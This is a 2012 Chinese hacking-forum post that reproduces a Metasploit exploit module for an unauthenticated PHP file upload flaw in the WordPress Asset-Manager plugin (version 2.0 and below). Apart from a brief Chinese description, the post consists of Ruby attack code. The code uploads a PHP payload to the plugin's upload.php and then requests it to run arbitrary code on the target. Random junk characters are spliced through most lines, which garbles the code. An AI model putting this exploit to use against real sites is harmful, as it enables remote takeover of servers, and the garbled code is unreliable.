找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2109|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。8 ^4 G) {+ m  O

5 t( `1 A( C( T, U- i##
: x9 }; O6 ^+ q2 Q' p9 L: |# This file is part of the Metasploit Framework and may be subject to
0 n0 y2 T; N" X6 Y% m, P$ f7 ~# redistribution and commercial restrictions. Please see the Metasploit
- G& @* w$ r! q5 G# Framework web site for more information on licensing and terms of use.: B1 {' e) n" z
#   http://metasploit.com/framework/
1 \( Z1 u0 o) V/ U; F##; l: l; C3 S) I4 J0 ^7 X

+ D0 d* Q, R0 O& Vrequire 'msf/core'. t3 @" @! p* p3 v1 F
require 'msf/core/exploit/php_exe'
! M3 e# X# {- l; V* R6 Z : m+ w# B4 O# y! H+ @( e$ o5 I
class Metasploit3 < Msf::Exploit::Remote0 |9 ?4 g2 D# Q% I9 t
  Rank = ExcellentRanking# C5 L. O; x+ e# d: T
/ I6 X( a) w  A* `
  include Msf::Exploit::Remote::HttpClient% x  P4 }, v# r' ^* n* p
  include Msf::Exploit:hpEXE
; a) c% P0 Y7 B4 c/ w  K# y' _6 F 6 y3 [" b- m& \
  def initialize(info = {})( e: X% p* S( A  G; w6 L
    super(update_info(info,
: S, x3 J% R* l( o0 V! w      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',& d9 D# ?8 h( H  D: c# A
      'Description'    => %q{* l0 S  h" O1 q' _& E% r
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress; K- m& V! V) G! _% {# X
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a4 N1 M/ @- Y. h& h
        temp directory without authentication, which results in arbitrary code execution.: f& S. P' z0 W" _' G' U
      },' `+ r) h- j3 g
      'Author'         =>1 y7 E! T% P7 D- S( Q
        [
! X0 p7 f0 R" i( }' [# j% n. S8 Y" ?          'Sammy FORGIT', # initial discovery
4 H8 T2 O, h  a/ S6 U. c7 b! Z$ y          'James Fitts <fitts.james[at]gmail.com>' # metasploit module* |" _1 _; l  b+ l1 H
        ],
5 A! C0 k6 z& N# o3 M+ f      'License'        => MSF_LICENSE,
% @7 f2 z6 ]5 J/ H* N      'References'     =>4 F) G# J3 H; A  r$ `2 i3 w4 i
        [9 Y1 e! y' ~2 Y' m) ^/ o
          [ 'OSVDB', '82653' ],
6 l% E6 v7 c7 z1 S6 B! a6 x8 m0 J          [ 'BID', '53809' ],
) d5 u2 h2 @( v4 U  D: l5 B: I( V          [ 'EDB', '18993' ],
( R5 z, u6 _9 }          [ 'URL', 'http:// www.myhack58.com /' ]  f; n. _) z- v  z) K4 Y6 _7 |
        ],
1 Z1 c' L3 _$ |' }* m! a. G      'Payload'       =>  l- k. j3 v: Y# q0 e" J: L
        {
, c9 r! W7 G8 g0 U& b  r& a9 ^          'BadChars' => "\x00",
3 v' H( L0 Q' r8 z        },: B+ |8 w" s: N; H; O1 G5 G7 a
      'Platform'       => 'php',' G4 ], n0 ~* q0 |5 D/ p( b' U/ K
      'Arch'           => ARCH_PHP,' ~) w7 l! k. E6 l  b0 e- l) c
      'Targets'        =>$ g2 K  I& J( R5 P  `! u6 S
        [9 K& K) s  D$ ^( W( i) z
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],. c0 @+ C4 Z6 d% ~' E0 ?0 {
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]! ~3 o- `. c1 _7 e2 F( u
        ],3 |" p( k4 f4 ^. h- r; n1 O7 U
      'DefaultTarget' => 0,! V4 h0 V; Y; K/ z& P* t+ S
      'DisclosureDate' => 'May 26 2012'))
& a! ~, r2 _7 @
2 a3 g4 y# P* J1 ^) M    register_options(
0 D( S/ P4 P& W# g* |$ o      [
# s, r0 p3 d' T        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
. d! r" S- |/ g/ o      ], self.class)  P1 A0 M1 a  U8 C2 n5 w6 y# P4 Z; r
  end* W4 L3 j* ?4 P7 ?+ w% ~2 v0 W
4 q9 y9 S$ F! N4 r# q) N7 L' _
  def exploit
7 q. t6 F* |& J0 G( \/ Y$ h6 Z    uri =  target_uri.path1 b7 o  v5 i- ]- ^, u- R
    uri << '/' if uri[-1,1] != '/'8 r2 }, C! B" n  V4 G6 i
    peer = "#{rhost}:#{rport}"
; b6 b( ^- }3 c7 \    payload_name = "#{rand_text_alpha(5)}.php"
4 W9 D, R0 R- [    php_payload = get_write_exec_payload(:unlink_self=>true)
) y5 o5 P$ r# Q  F4 V. P
3 u" f( x2 I( N1 Q! `' R    data = Rex::MIME::Message.new# P# t9 y4 V3 B- X/ U9 }" s; A& r% X
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\""), y; v# e$ |+ E8 q* J
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')4 y+ M+ |. t3 y' ?
( @4 l3 \1 ^; ^9 k  O7 E
    print_status("#{peer} - Uploading payload #{payload_name}")
* g" a" A2 ?5 Z/ s; N- Q    res = send_request_cgi({
# x! z; A" V: l: D4 Y1 M. n7 A      'method'  => 'POST'," K% y% p1 b: A' a/ q" i' _3 T. W
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
8 c$ L( P" t$ S. i      'ctype'   => "multipart/form-data; boundary=#{data.bound}",/ H+ b3 I/ t2 \5 x7 J
      'data'    => post_data# \& g+ p& J( i' m
    })/ b6 b( ]7 k( m

" A" |: W& u- Y" \& }3 \6 S    if not res or res.code != 200 or res.body !~ /#{payload_name}/
' f: m9 L/ \  L9 ]+ V8 H      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
8 A8 ~5 N4 g. f, P, c/ T2 v0 q) Rend
: k% a! v5 D4 K# ` 6 w3 t7 ]3 B/ r+ C7 D: E4 B% U
    print_status("#{peer} - Executing payload #{payload_name}")" C" o/ V* G  d7 M$ M0 l
    res = send_request_raw({! Y! S# b6 \+ k0 h
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
0 v' v6 D& H( m  `4 c2 r/ |      'method'  => 'GET'
4 J7 }. P0 s2 k    })# K9 o4 y( s! w) n9 Y5 _

+ }. q: C4 k! |1 b  m& \    if res and res.code != 200  R3 n1 L2 ^+ D2 F7 q0 J+ n
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
' ?1 _& h7 i5 v' c* V    end
8 ]/ Y7 y+ G8 i; H5 M6 P7 Y  end
8 S+ Z8 d  ^4 P9 u4 z, @end
. N6 s8 J4 p$ h
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表